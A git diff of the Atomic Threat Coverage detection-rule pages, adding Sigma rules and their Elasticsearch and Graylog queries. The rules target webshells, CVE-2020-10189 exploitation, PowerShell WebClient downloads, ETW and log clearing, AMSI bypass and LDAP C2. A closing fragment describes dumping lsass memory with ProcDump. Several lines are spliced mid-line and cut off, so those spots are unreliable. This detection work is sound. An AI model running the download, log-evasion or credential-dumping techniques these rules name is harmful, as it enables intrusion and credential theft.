| **Data Needed** | - [DN_0015_11_windows_sysmon_FileCreate](../Data_Needed/DN_0015_11_windows_sysmon_FileCreate.md)
|
@@ -20,7 +20,7 @@
title: Windows Webshell Creation
id: 39f1f9f2-9636-45de-98f6-a4046aa8e4b9
status: experimental
-description: Posible webshell file creation on a static web site
+description: Possible webshell file creation on a static web site
references:
- PT ESC rule and personal experience
author: Beyu Denis, oscd.community
@@ -77,7 +77,7 @@ falsepositives:
### xpack-watcher
```
-curl -s -XPUT -H \'Content-Type: application/json\' --data-binary @- localhost:9200/_watcher/watch/39f1f9f2-9636-45de-98f6-a4046aa8e4b9 <[TA0007: Discovery](https://attack.mitre.org/tactics/TA0007) |
+| **ATT&CK Technique** | - [T1087: Account Discovery](https://attack.mitre.org/techniques/T1087)
|
+| **Data Needed** | - [DN_0030_4662_operation_was_performed_on_an_object](../Data_Needed/DN_0030_4662_operation_was_performed_on_an_object.md)
|
+| **Trigger** | - [T1087: Account Discovery](../Triggers/T1087.md)
|
+| **Severity Level** | medium |
+| **False Positives** | - Administrators configuring new users.
|
+| **Development Status** | experimental |
+| **References** | - [https://www.specterops.io/assets/resources/an_ace_up_the_sleeve.pdf](https://www.specterops.io/assets/resources/an_ace_up_the_sleeve.pdf)
- [http://www.stuffithoughtiknew.com/2019/02/detecting-bloodhound.html](http://www.stuffithoughtiknew.com/2019/02/detecting-bloodhound.html)
- [https://docs.microsoft.com/en-us/windows/win32/adschema/attributes-all](https://docs.microsoft.com/en-us/windows/win32/adschema/attributes-all)
|
+| **Author** | Maxime Thiebaut (@0xThiebaut) |
+
+
+## Detection Rules
+
+### Sigma rule
+
+```
+title: AD User Enumeration
+id: ab6bffca-beff-4baa-af11-6733f296d57a
+description: Detects access to a domain user from a non-machine account
+status: experimental
+date: 2020/03/30
+author: Maxime Thiebaut (@0xThiebaut)
+references:
+ - https://www.specterops.io/assets/resources/an_ace_up_the_sleeve.pdf
+ - http://www.stuffithoughtiknew.com/2019/02/detecting-bloodhound.html
+ - https://docs.microsoft.com/en-us/windows/win32/adschema/attributes-all # For further investigation of the accessed properties
+tags:
+ - attack.discovery
+ - attack.t1087
+logsource:
+ product: windows
+ service: security
+ definition: Requires the "Read all properties" permission on the user object to be audited for the "Everyone" principal
+detection:
+ selection:
+ EventID: 4662
+ ObjectType|contains: # Using contains as the data commonly is structured as "%{bf967aba-0de6-11d0-a285-00aa003049e2}"
+ - 'bf967aba-0de6-11d0-a285-00aa003049e2' # The user class (https://docs.microsoft.com/en-us/windows/win32/adschema/c-user)
+ filter:
+ - SubjectUserName|endswith: '$' # Exclude machine accounts
+ - SubjectUserName|startswith: 'MSOL_' # https://docs.microsoft.com/en-us/azure/active-directory/hybrid/reference-connect-accounts-permissions#ad-ds-connector-account
+ condition: selection and not filter
+falsepositives:
+ - Administrators configuring new users.
+level: medium
+
+```
+
+
+
+
+
+### es-qs
+
+```
+((EventID:"4662" AND ObjectType.keyword:(*bf967aba\\-0de6\\-11d0\\-a285\\-00aa003049e2*)) AND (NOT (SubjectUserName.keyword:*$ OR SubjectUserName.keyword:MSOL_*)))
+```
+
+
+### xpack-watcher
+
+```
+curl -s -XPUT -H \'Content-Type: application/json\' --data-binary @- localhost:9200/_watcher/watch/ab6bffca-beff-4baa-af11-6733f296d57a <[TA0006: Credential Access](https://attack.mitre.org/tactics/TA0006) |
@@ -17,7 +17,7 @@
### Sigma rule
```
-title: Judgement Panda Exfil Activity
+title: Judgement Panda Credential Access Activity
id: b83f5166-9237-4b5e-9cd4-7b5d52f4d8ee
description: Detects Russian group activity as described in Global Threat Report 2019 by Crowdstrike
references:
@@ -59,7 +59,7 @@ level: critical
### xpack-watcher
```
-curl -s -XPUT -H \'Content-Type: application/json\' --data-binary @- localhost:9200/_watcher/watch/b83f5166-9237-4b5e-9cd4-7b5d52f4d8ee <[DN_0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN_0002_4688_windows_process_creation_with_commandline.md)[DN_0003_1_windows_sysmon_process_creation](../Data_Needed/DN_0003_1_windows_sysmon_process_creation.md) |
| **Trigger** | - [T1070: Indicator Removal on Host](../Triggers/T1070.md)
|
| **Severity Level** | high |
-| **False Positives** | There are no documented False Positives for this Detection Rule yet |
-| **Development Status** | Development Status wasn't defined for this Detection Rule yet |
+| **False Positives** | |
+| **Development Status** | experimental |
| **References** | - [https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/wevtutil](https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/wevtutil)
- [https://github.com/Neo23x0/sigma/blob/master/rules/windows/process_creation/win_mal_lockergoga.yml](https://github.com/Neo23x0/sigma/blob/master/rules/windows/process_creation/win_mal_lockergoga.yml)
- [https://abuse.io/lockergoga.txt](https://abuse.io/lockergoga.txt)
|
| **Author** | @neu5ron, Florian Roth |
| Other Tags | |
@@ -20,6 +20,7 @@
title: Disable of ETW Trace
id: a238b5d0-ce2d-4414-a676-7a531b3d13d6
description: Detects a command that clears or disables any ETW trace log which could indicate a logging evasion.
+status: experimental
references:
- https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/wevtutil
- https://github.com/Neo23x0/sigma/blob/master/rules/windows/process_creation/win_mal_lockergoga.yml
@@ -44,6 +45,8 @@ detection:
selection_disable_2:
CommandLine: '* set-log* /e:false*'
condition: selection_clear_1 or selection_clear_2 or selection_disable_1 or selection_disable_2
+falsepositives:
+ - Unknown
```
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_exploit_cve_2020_10189.md b/Atomic_Threat_Coverage/Detection_Rules/win_exploit_cve_2020_10189.md
new file mode 100644
index 0000000..fe2b016
--- /dev/null
+++ b/Atomic_Threat_Coverage/Detection_Rules/win_exploit_cve_2020_10189.md
@@ -0,0 +1,97 @@
+| Title | Exploited CVE-2020-10189 Zoho ManageEngine |
+|:-------------------------|:------------------|
+| **Description** | Detects the exploitation of Zoho ManageEngine Desktop Central Java Deserialization vulnerability reported as CVE-2020-10189 |
+| **ATT&CK Tactic** | - [TA0001: Initial Access](https://attack.mitre.org/tactics/TA0001)
|
+| **ATT&CK Technique** | - [T1190: Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190)
|
+| **Data Needed** | - [DN_0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN_0002_4688_windows_process_creation_with_commandline.md)
- [DN_0003_1_windows_sysmon_process_creation](../Data_Needed/DN_0003_1_windows_sysmon_process_creation.md)
|
+| **Trigger** | - [T1190: Exploit Public-Facing Application](../Triggers/T1190.md)
|
+| **Severity Level** | critical |
+| **False Positives** | |
+| **Development Status** | experimental |
+| **References** | - [https://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html](https://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html)
- [https://nvd.nist.gov/vuln/detail/CVE-2020-10189](https://nvd.nist.gov/vuln/detail/CVE-2020-10189)
- [https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10189](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10189)
- [https://vulmon.com/exploitdetails?qidtp=exploitdb&qid=48224](https://vulmon.com/exploitdetails?qidtp=exploitdb&qid=48224)
|
+| **Author** | Florian Roth |
+
+
+## Detection Rules
+
+### Sigma rule
+
+```
+title: Exploited CVE-2020-10189 Zoho ManageEngine
+id: 846b866e-2a57-46ee-8e16-85fa92759be7
+status: experimental
+description: Detects the exploitation of Zoho ManageEngine Desktop Central Java Deserialization vulnerability reported as CVE-2020-10189
+references:
+ - https://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html
+ - https://nvd.nist.gov/vuln/detail/CVE-2020-10189
+ - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10189
+ - https://vulmon.com/exploitdetails?qidtp=exploitdb&qid=48224
+author: Florian Roth
+date: 2020/03/25
+tags:
+ - attack.initial_access
+ - attack.t1190
+logsource:
+ category: process_creation
+ product: windows
+detection:
+ selection:
+ ParentImage|endswith: 'DesktopCentral_Server\jre\bin\java.exe'
+ Image|endswith:
+ - '*\cmd.exe'
+ - '*\powershell.exe'
+ - '*\bitsadmin.exe'
+ condition: selection
+falsepositives:
+ - Unknown
+level: critical
+
+```
+
+
+
+
+
+### es-qs
+
+```
+(ParentImage.keyword:*DesktopCentral_Server\\\\jre\\\\bin\\\\java.exe AND Image.keyword:(*\\\\cmd.exe OR *\\\\powershell.exe OR *\\\\bitsadmin.exe))
+```
+
+
+### xpack-watcher
+
+```
+curl -s -XPUT -H \'Content-Type: application/json\' --data-binary @- localhost:9200/_watcher/watch/846b866e-2a57-46ee-8e16-85fa92759be7 <[TA0002: Execution](https://attack.mitre.org/tactics/TA0002)[TA0005: Defense Evasion](https://attack.mitre.org/tactics/TA0005) |
+| **ATT&CK Technique** | - [T1223: Compiled HTML File](https://attack.mitre.org/techniques/T1223)
|
+| **Data Needed** | - [DN_0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN_0002_4688_windows_process_creation_with_commandline.md)
- [DN_0003_1_windows_sysmon_process_creation](../Data_Needed/DN_0003_1_windows_sysmon_process_creation.md)
|
+| **Trigger** | - [T1223: Compiled HTML File](../Triggers/T1223.md)
|
+| **Severity Level** | high |
+| **False Positives** | |
+| **Development Status** | experimental |
+| **References** | - [https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/chm-badness-delivers-a-banking-trojan/](https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/chm-badness-delivers-a-banking-trojan/)
|
+| **Author** | Maxim Pavlunin |
+
+
+## Detection Rules
+
+### Sigma rule
+
+```
+title: HTML Help Shell Spawn
+id: 52cad028-0ff0-4854-8f67-d25dfcbc78b4
+status: experimental
+description: Detects a suspicious child process of a Microsoft HTML Help system when executing compiled HTML files (.chm)
+references:
+ - https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/chm-badness-delivers-a-banking-trojan/
+author: Maxim Pavlunin
+date: 2020/04/01
+modified: 2020/04/03
+tags:
+ - attack.execution
+ - attack.defense_evasion
+ - attack.t1223
+logsource:
+ category: process_creation
+ product: windows
+detection:
+ selection:
+ ParentImage: 'C:\Windows\hh.exe'
+ Image|endswith:
+ - '\cmd.exe'
+ - '\powershell.exe'
+ - '\wscript.exe'
+ - '\cscript.exe'
+ - '\regsvr32.exe'
+ - '\wmic.exe'
+ - '\rundll32.exe'
+ condition: selection
+fields:
+ - CommandLine
+ - ParentCommandLine
+falsepositives:
+ - unknown
+level: high
+
+```
+
+
+
+
+
+### es-qs
+
+```
+(ParentImage:"C\\:\\\\Windows\\\\hh.exe" AND Image.keyword:(*\\\\cmd.exe OR *\\\\powershell.exe OR *\\\\wscript.exe OR *\\\\cscript.exe OR *\\\\regsvr32.exe OR *\\\\wmic.exe OR *\\\\rundll32.exe))
+```
+
+
+### xpack-watcher
+
+```
+curl -s -XPUT -H \'Content-Type: application/json\' --data-binary @- localhost:9200/_watcher/watch/52cad028-0ff0-4854-8f67-d25dfcbc78b4 <\\ *
```
### xpack-watcher
```
-curl -s -XPUT -H \'Content-Type: application/json\' --data-binary @- localhost:9200/_watcher/watch/f1531fa4-5b84-4342-8f68-9cf3fdbd83d4 <\\\\ *"\n },\n "trigger": {\n "schedule": {\n "interval": "30m"\n }\n },\n "input": {\n "search": {\n "request": {\n "body": {\n "size": 0,\n "query": {\n "bool": {\n "must": [\n {\n "query_string": {\n "query": "CommandLine.keyword:*\\\\ echo\\\\ EEEE\\\\ >\\\\ *",\n "analyze_wildcard": true\n }\n }\n ],\n "filter": {\n "range": {\n "timestamp": {\n "gte": "now-30m/m"\n }\n }\n }\n }\n }\n },\n "indices": []\n }\n }\n },\n "condition": {\n "compare": {\n "ctx.payload.hits.total": {\n "not_eq": 0\n }\n }\n },\n "actions": {\n "send_email": {\n "email": {\n "to": "root@localhost",\n "subject": "Sigma Rule \'DTRACK Process Creation\'",\n "body": "Hits:\\n{{#ctx.payload.hits.hits}}Hit on {{_source.@timestamp}}:\\n CommandLine = {{_source.CommandLine}}\\nParentCommandLine = {{_source.ParentCommandLine}}================================================================================\\n{{/ctx.payload.hits.hits}}",\n "attachments": {\n "data.json": {\n "data": {\n "format": "json"\n }\n }\n }\n }\n }\n }\n}\nEOF\n
```
### graylog
```
-CommandLine.keyword:* echo EEEE *
+CommandLine.keyword:* echo EEEE > *
```
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_malware_formbook.md b/Atomic_Threat_Coverage/Detection_Rules/win_malware_formbook.md
index 18841af..0553a81 100644
--- a/Atomic_Threat_Coverage/Detection_Rules/win_malware_formbook.md
+++ b/Atomic_Threat_Coverage/Detection_Rules/win_malware_formbook.md
@@ -62,21 +62,21 @@ level: critical
### es-qs
```
-(ParentCommandLine.keyword:(C\\:\\\\Windows\\\\System32\\\\*.exe OR C\\:\\\\Windows\\\\SysWOW64\\\\*.exe) AND CommandLine.keyword:(*\\ \\/c\\ del\\ \\"C\\:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Temp\\\\*.exe OR *\\ \\/c\\ del\\ \\"C\\:\\\\Users\\\\*\\\\Desktop\\\\*.exe OR *\\ \\/C\\ type\\ nul\\ \\ \\"C\\:\\\\Users\\\\*\\\\Desktop\\\\*.exe))
+(ParentCommandLine.keyword:(C\\:\\\\Windows\\\\System32\\\\*.exe OR C\\:\\\\Windows\\\\SysWOW64\\\\*.exe) AND CommandLine.keyword:(*\\ \\/c\\ del\\ \\"C\\:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Temp\\\\*.exe OR *\\ \\/c\\ del\\ \\"C\\:\\\\Users\\\\*\\\\Desktop\\\\*.exe OR *\\ \\/C\\ type\\ nul\\ >\\ \\"C\\:\\\\Users\\\\*\\\\Desktop\\\\*.exe))
```
### xpack-watcher
```
-curl -s -XPUT -H \'Content-Type: application/json\' --data-binary @- localhost:9200/_watcher/watch/032f5fb3-d959-41a5-9263-4173c802dc2b <\\\\ \\\\\\"C\\\\:\\\\\\\\Users\\\\\\\\*\\\\\\\\Desktop\\\\\\\\*.exe))"\n },\n "trigger": {\n "schedule": {\n "interval": "30m"\n }\n },\n "input": {\n "search": {\n "request": {\n "body": {\n "size": 0,\n "query": {\n "bool": {\n "must": [\n {\n "query_string": {\n "query": "(ParentCommandLine.keyword:(C\\\\:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\*.exe OR C\\\\:\\\\\\\\Windows\\\\\\\\SysWOW64\\\\\\\\*.exe) AND CommandLine.keyword:(*\\\\ \\\\/c\\\\ del\\\\ \\\\\\"C\\\\:\\\\\\\\Users\\\\\\\\*\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\*.exe OR *\\\\ \\\\/c\\\\ del\\\\ \\\\\\"C\\\\:\\\\\\\\Users\\\\\\\\*\\\\\\\\Desktop\\\\\\\\*.exe OR *\\\\ \\\\/C\\\\ type\\\\ nul\\\\ >\\\\ \\\\\\"C\\\\:\\\\\\\\Users\\\\\\\\*\\\\\\\\Desktop\\\\\\\\*.exe))",\n "analyze_wildcard": true\n }\n }\n ],\n "filter": {\n "range": {\n "timestamp": {\n "gte": "now-30m/m"\n }\n }\n }\n }\n }\n },\n "indices": []\n }\n }\n },\n "condition": {\n "compare": {\n "ctx.payload.hits.total": {\n "not_eq": 0\n }\n }\n },\n "actions": {\n "send_email": {\n "email": {\n "to": "root@localhost",\n "subject": "Sigma Rule \'Formbook Process Creation\'",\n "body": "Hits:\\n{{#ctx.payload.hits.hits}}Hit on {{_source.@timestamp}}:\\n CommandLine = {{_source.CommandLine}}\\nParentCommandLine = {{_source.ParentCommandLine}}================================================================================\\n{{/ctx.payload.hits.hits}}",\n "attachments": {\n "data.json": {\n "data": {\n "format": "json"\n }\n }\n }\n }\n }\n }\n}\nEOF\n
```
### graylog
```
-(ParentCommandLine.keyword:(C\\:\\\\Windows\\\\System32\\\\*.exe C\\:\\\\Windows\\\\SysWOW64\\\\*.exe) AND CommandLine.keyword:(* \\/c del \\"C\\:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Temp\\\\*.exe * \\/c del \\"C\\:\\\\Users\\\\*\\\\Desktop\\\\*.exe * \\/C type nul \\"C\\:\\\\Users\\\\*\\\\Desktop\\\\*.exe))
+(ParentCommandLine.keyword:(C\\:\\\\Windows\\\\System32\\\\*.exe C\\:\\\\Windows\\\\SysWOW64\\\\*.exe) AND CommandLine.keyword:(* \\/c del \\"C\\:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Temp\\\\*.exe * \\/c del \\"C\\:\\\\Users\\\\*\\\\Desktop\\\\*.exe * \\/C type nul > \\"C\\:\\\\Users\\\\*\\\\Desktop\\\\*.exe))
```
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_malware_trickbot_recon_activity.md b/Atomic_Threat_Coverage/Detection_Rules/win_malware_trickbot_recon_activity.md
index dbe39d4..a87e5db 100644
--- a/Atomic_Threat_Coverage/Detection_Rules/win_malware_trickbot_recon_activity.md
+++ b/Atomic_Threat_Coverage/Detection_Rules/win_malware_trickbot_recon_activity.md
@@ -24,7 +24,7 @@ description: Trickbot enumerates domain/network topology and executes certain co
references:
- https://www.sneakymonkey.net/2019/05/22/trickbot-analysis/
author: David Burkett
-date: 12/28/2019
+date: 2019/12/28
tags:
- attack.t1482
logsource:
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_multiple_suspicious_cli.md b/Atomic_Threat_Coverage/Detection_Rules/win_multiple_suspicious_cli.md
index 106d061..f0175f4 100644
--- a/Atomic_Threat_Coverage/Detection_Rules/win_multiple_suspicious_cli.md
+++ b/Atomic_Threat_Coverage/Detection_Rules/win_multiple_suspicious_cli.md
@@ -93,7 +93,7 @@ level: low
### xpack-watcher
```
-curl -s -XPUT -H \'Content-Type: application/json\' --data-binary @- localhost:9200/_watcher/watch/61ab5496-748e-4818-a92f-de78e20fe7f1 <[DN_0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN_0002_4688_windows_process_creation_with_commandline.md)[DN_0003_1_windows_sysmon_process_creation](../Data_Needed/DN_0003_1_windows_sysmon_process_creation.md) |
| **Trigger** | - [T1086: PowerShell](../Triggers/T1086.md)
|
| **Severity Level** | high |
-| **False Positives** | There are no documented False Positives for this Detection Rule yet |
+| **False Positives** | |
| **Development Status** | experimental |
| **References** | - [https://twitter.com/mattifestation/status/735261176745988096](https://twitter.com/mattifestation/status/735261176745988096)
- [https://www.hybrid-analysis.com/sample/0ced17419e01663a0cd836c9c2eb925e3031ffb5b18ccf35f4dea5d586d0203e?environmentId=120](https://www.hybrid-analysis.com/sample/0ced17419e01663a0cd836c9c2eb925e3031ffb5b18ccf35f4dea5d586d0203e?environmentId=120)
|
| **Author** | Markus Neis |
@@ -41,8 +41,8 @@ detection:
CommandLine:
- '*amsiInitFailed*'
condition: selection1 and selection2
- falsepositives:
- - Potential Admin Activity
+falsepositives:
+ - Potential Admin Activity
level: high
```
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_rare_schtask_creation.md b/Atomic_Threat_Coverage/Detection_Rules/win_rare_schtask_creation.md
index b22ed0e..0162576 100644
--- a/Atomic_Threat_Coverage/Detection_Rules/win_rare_schtask_creation.md
+++ b/Atomic_Threat_Coverage/Detection_Rules/win_rare_schtask_creation.md
@@ -56,7 +56,7 @@ level: low
### xpack-watcher
```
-curl -s -XPUT -H \'Content-Type: application/json\' --data-binary @- localhost:9200/_watcher/watch/b20f6158-9438-41be-83da-a5a16ac90c2b <[TA0003: Persistence](https://attack.mitre.org/tactics/TA0003) |
+| **ATT&CK Technique** | - [T1041: Exfiltration Over Command and Control Channel](https://attack.mitre.org/techniques/T1041)
|
+| **Data Needed** | - [DN_0026_5136_windows_directory_service_object_was_modified](../Data_Needed/DN_0026_5136_windows_directory_service_object_was_modified.md)
|
+| **Trigger** | - [T1041: Exfiltration Over Command and Control Channel](../Triggers/T1041.md)
|
+| **Severity Level** | high |
+| **False Positives** | - Companies, who may use these default LDAP-Attributes for personal information
|
+| **Development Status** | experimental |
+| **References** | - [https://medium.com/@ivecodoe/detecting-ldapfragger-a-newly-released-cobalt-strike-beacon-using-ldap-for-c2-communication-c274a7f00961](https://medium.com/@ivecodoe/detecting-ldapfragger-a-newly-released-cobalt-strike-beacon-using-ldap-for-c2-communication-c274a7f00961)
- [https://blog.fox-it.com/2020/03/19/ldapfragger-command-and-control-over-ldap-attributes/](https://blog.fox-it.com/2020/03/19/ldapfragger-command-and-control-over-ldap-attributes/)
- [https://github.com/fox-it/LDAPFragger](https://github.com/fox-it/LDAPFragger)
|
+| **Author** | xknow @xknow_infosec |
+
+
+## Detection Rules
+
+### Sigma rule
+
+```
+title: Suspicious LDAP-Attributes Used
+id: d00a9a72-2c09-4459-ad03-5e0a23351e36
+description: detects the usage of particular AttributeLDAPDisplayNames, which are known for data exchange via LDAP by the tool LDAPFragger and are additionally not commonly used in companies.
+status: experimental
+date: 2019/03/24
+author: xknow @xknow_infosec
+references:
+ - https://medium.com/@ivecodoe/detecting-ldapfragger-a-newly-released-cobalt-strike-beacon-using-ldap-for-c2-communication-c274a7f00961
+ - https://blog.fox-it.com/2020/03/19/ldapfragger-command-and-control-over-ldap-attributes/
+ - https://github.com/fox-it/LDAPFragger
+tags:
+ - attack.t1041
+ - attack.persistence
+logsource:
+ product: windows
+ service: security
+detection:
+ selection:
+ EventID: 5136
+ AttributeValue: '*'
+ AttributeLDAPDisplayName:
+ - 'primaryInternationalISDNNumber'
+ - 'otherFacsimileTelephoneNumber'
+ - 'primaryTelexNumber'
+ condition: selection
+falsepositives:
+ - Companies, who may use these default LDAP-Attributes for personal information
+level: high
+
+```
+
+
+
+
+
+### es-qs
+
+```
+(EventID:"5136" AND AttributeValue.keyword:* AND AttributeLDAPDisplayName:("primaryInternationalISDNNumber" OR "otherFacsimileTelephoneNumber" OR "primaryTelexNumber"))
+```
+
+
+### xpack-watcher
+
+```
+curl -s -XPUT -H \'Content-Type: application/json\' --data-binary @- localhost:9200/_watcher/watch/d00a9a72-2c09-4459-ad03-5e0a23351e36 <[TA0002: Execution](https://attack.mitre.org/tactics/TA0002) |
+| **ATT&CK Technique** | - [T1086: PowerShell](https://attack.mitre.org/techniques/T1086)
|
+| **Data Needed** | - [DN_0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN_0002_4688_windows_process_creation_with_commandline.md)
- [DN_0003_1_windows_sysmon_process_creation](../Data_Needed/DN_0003_1_windows_sysmon_process_creation.md)
|
+| **Trigger** | - [T1086: PowerShell](../Triggers/T1086.md)
|
+| **Severity Level** | high |
+| **False Positives** | |
+| **Development Status** | experimental |
+| **References** | - [https://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html](https://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html)
|
+| **Author** | Florian Roth |
+
+
+## Detection Rules
+
+### Sigma rule
+
+```
+title: PowerShell DownloadFile
+id: 8f70ac5f-1f6f-4f8e-b454-db19561216c5
+status: experimental
+description: Detects the execution of powershell, a WebClient object creation and the invocation of DownloadFile in a single command line
+references:
+ - https://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html
+author: Florian Roth
+date: 2020/03/25
+tags:
+ - attack.execution
+ - attack.t1086
+logsource:
+ category: process_creation
+ product: windows
+detection:
+ selection:
+ CommandLine|contains|all:
+ - 'powershell'
+ - '.DownloadFile'
+ - 'System.Net.WebClient'
+ condition: selection
+falsepositives:
+ - Unknown
+level: high
+
+```
+
+
+
+
+
+### es-qs
+
+```
+(CommandLine.keyword:*powershell* AND CommandLine.keyword:*.DownloadFile* AND CommandLine.keyword:*System.Net.WebClient*)
+```
+
+
+### xpack-watcher
+
+```
+curl -s -XPUT -H \'Content-Type: application/json\' --data-binary @- localhost:9200/_watcher/watch/8f70ac5f-1f6f-4f8e-b454-db19561216c5 <[TA0005: Defense Evasion](https://attack.mitre.org/tactics/TA0005) |
| **ATT&CK Technique** | - [T1070: Indicator Removal on Host](https://attack.mitre.org/techniques/T1070)
|
-| **Data Needed** | - [DN_0038_1102_the_audit_log_was_cleared](../Data_Needed/DN_0038_1102_the_audit_log_was_cleared.md)
- [DN_0050_1102_audit_log_was_cleared](../Data_Needed/DN_0050_1102_audit_log_was_cleared.md)
|
+| **Data Needed** | - [DN_0050_1102_audit_log_was_cleared](../Data_Needed/DN_0050_1102_audit_log_was_cleared.md)
|
| **Trigger** | - [T1070: Indicator Removal on Host](../Triggers/T1070.md)
|
| **Severity Level** | high |
| **False Positives** | - Rollout of log collection agents (the setup routine often includes a reset of the local Eventlog)
- System provisioning (system reset before the golden image creation)
|
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_susp_svchost_no_cli.md b/Atomic_Threat_Coverage/Detection_Rules/win_susp_svchost_no_cli.md
index 376b6ba..4d04313 100644
--- a/Atomic_Threat_Coverage/Detection_Rules/win_susp_svchost_no_cli.md
+++ b/Atomic_Threat_Coverage/Detection_Rules/win_susp_svchost_no_cli.md
@@ -24,7 +24,7 @@ description: It is extremely abnormal for svchost.exe to spawn without any CLI a
references:
- https://securitybytes.io/blue-team-fundamentals-part-two-windows-processes-759fe15965e2
author: David Burkett
-date: 12/28/2019
+date: 2019/12/28
tags:
- attack.t1055
logsource:
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_sysmon_driver_unload.md b/Atomic_Threat_Coverage/Detection_Rules/win_sysmon_driver_unload.md
index 0d4de79..a9cc79d 100644
--- a/Atomic_Threat_Coverage/Detection_Rules/win_sysmon_driver_unload.md
+++ b/Atomic_Threat_Coverage/Detection_Rules/win_sysmon_driver_unload.md
@@ -6,7 +6,7 @@
| **Data Needed** | - [DN_0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN_0002_4688_windows_process_creation_with_commandline.md)
- [DN_0003_1_windows_sysmon_process_creation](../Data_Needed/DN_0003_1_windows_sysmon_process_creation.md)
|
| **Trigger** | There is no documented Trigger for this Detection Rule yet |
| **Severity Level** | high |
-| **False Positives** | |
+| **False Positives** | |
| **Development Status** | experimental |
| **References** | - [https://www.darkoperator.com/blog/2018/10/5/operating-offensively-against-sysmon](https://www.darkoperator.com/blog/2018/10/5/operating-offensively-against-sysmon)
|
| **Author** | Kirill Kiryanov, oscd.community |
@@ -36,7 +36,8 @@ detection:
- 'unload'
- 'sys'
condition: selection
-falsepositives: Unknown
+falsepositives:
+ - Unknown
level: high
fields:
- CommandLine
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_system_exe_anomaly.md b/Atomic_Threat_Coverage/Detection_Rules/win_system_exe_anomaly.md
index db3faca..bc1e4bc 100644
--- a/Atomic_Threat_Coverage/Detection_Rules/win_system_exe_anomaly.md
+++ b/Atomic_Threat_Coverage/Detection_Rules/win_system_exe_anomaly.md
@@ -48,10 +48,11 @@ detection:
- '*\lsm.exe'
- '*\winlogon.exe'
- '*\explorer.exe'
- - '*\taskhost.exe'
+ - '*\taskhost.exe'
filter:
Image:
- 'C:\Windows\System32\\*'
+ - 'C:\Windows\system32\\*'
- 'C:\Windows\SysWow64\\*'
- 'C:\Windows\SysWOW64\\*'
- 'C:\Windows\explorer.exe'
@@ -76,42 +77,42 @@ level: high
### es-qs
```
-(Image.keyword:(*\\\\svchost.exe OR *\\\\rundll32.exe OR *\\\\services.exe OR *\\\\powershell.exe OR *\\\\regsvr32.exe OR *\\\\spoolsv.exe OR *\\\\lsass.exe OR *\\\\smss.exe OR *\\\\csrss.exe OR *\\\\conhost.exe OR *\\\\wininit.exe OR *\\\\lsm.exe OR *\\\\winlogon.exe OR *\\\\explorer.exe OR *\\\\taskhost.exe) AND (NOT (Image.keyword:(C\\:\\\\Windows\\\\System32\\\\* OR C\\:\\\\Windows\\\\SysWow64\\\\* OR C\\:\\\\Windows\\\\SysWOW64\\\\* OR C\\:\\\\Windows\\\\explorer.exe OR C\\:\\\\Windows\\\\winsxs\\\\* OR C\\:\\\\Windows\\\\WinSxS\\\\* OR \\\\SystemRoot\\\\System32\\\\*))))
+(Image.keyword:(*\\\\svchost.exe OR *\\\\rundll32.exe OR *\\\\services.exe OR *\\\\powershell.exe OR *\\\\regsvr32.exe OR *\\\\spoolsv.exe OR *\\\\lsass.exe OR *\\\\smss.exe OR *\\\\csrss.exe OR *\\\\conhost.exe OR *\\\\wininit.exe OR *\\\\lsm.exe OR *\\\\winlogon.exe OR *\\\\explorer.exe OR *\\\\taskhost.exe) AND (NOT (Image.keyword:(C\\:\\\\Windows\\\\System32\\\\* OR C\\:\\\\Windows\\\\system32\\\\* OR C\\:\\\\Windows\\\\SysWow64\\\\* OR C\\:\\\\Windows\\\\SysWOW64\\\\* OR C\\:\\\\Windows\\\\explorer.exe OR C\\:\\\\Windows\\\\winsxs\\\\* OR C\\:\\\\Windows\\\\WinSxS\\\\* OR \\\\SystemRoot\\\\System32\\\\*))))
```
### xpack-watcher
```
-curl -s -XPUT -H \'Content-Type: application/json\' --data-binary @- localhost:9200/_watcher/watch/e4a6b256-3e47-40fc-89d2-7a477edd6915 <
@@ -353,7 +357,7 @@ del %temp%\security >nul 2> nul
The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with Sysinternals
ProcDump.
-Upon successful execution, you should see a file the following file created C:\Windows\Temp\lsass_dump.dmp.
+Upon successful execution, you should see the following file created c:\windows\temp\lsass_dump.dmp.
If you see a message saying "procdump.exe is not recognized as an internal or external command", try using the get-prereq_commands to download and install the ProcDump tool first.
@@ -403,7 +407,88 @@ Copy-Item $env:TEMP\Procdump\Procdump.exe #{procdump_exe} -Force
